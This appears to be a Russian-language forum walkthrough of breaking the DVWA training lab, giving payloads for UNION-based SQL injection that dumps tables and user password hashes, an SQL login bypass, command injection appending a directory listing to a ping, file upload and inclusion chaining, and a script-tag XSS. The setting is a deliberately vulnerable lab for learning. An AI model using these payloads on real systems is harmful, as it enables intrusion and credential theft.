Вот как я ломал
1.Low SQL-Inj
Код:
-1' UNION SELECT concat_ws(0x3A,user(),version(),database()),'ololo sql :D'/*
Узнаем инфу, дальше:
Код:
-1' UNION SELECT table_name,'table' FROM information_schema.tables WHERE table_schema='dvwa'/*
Тут узнали таблицы, дальше:
Код:
-1' UNION SELECT column_name,'column' FROM information_schema.columns WHERE table_schema='dvwa'/*
Так узнаем колонки, и наконец:
Код:
-1' UNION SELECT concat_ws(0x3A,user_id,first_name,last_name,user,password,avatar),concat('info about ',first_name,' aka ',user) FROM users/*
Юзверята

2. Low Brute
Тут 2 пути:
1) Через скулю (это вооонтам наверху) достаем хэши, брутим на hashcracking,gdataonline, md5.rednoise etc, благо пароли слабые
2)
Код:
Логин: admin' /*
Пасс: ололо админ школота
Ну и угадайте что происходит

3. Low Command Execution
Код:
127.0.0.1 && dir C:\
Наблюдаем пинг 127.0.0.1 и листинг диска C:\
4. Low Upload
Код:
No comments aka тупо льем
5. Low File Inclusion
Код:
http://site/fi_content.php
=> инклудит файлы из корня
Тут видно, что есть связка - LFI и Upload Vuln, берем сканер по хеадерам и сканим известные диры aka up, upload, uploads и находим uploads с прямым листингом

6. XSS
Код:
</pre><script>alert('xss :D')</script><pre>some HaCkEr
Видим тупую XSS
7. BONUS:
в медиум SQL-Inj:
Код:
-1 UNION SELECT concat_ws(0x3A,user(),version(),database()),2/*
Вот такие пироги
С последующими уровнями становится больше и больше фильтров, но как говорится на каждый замок - своя отмычка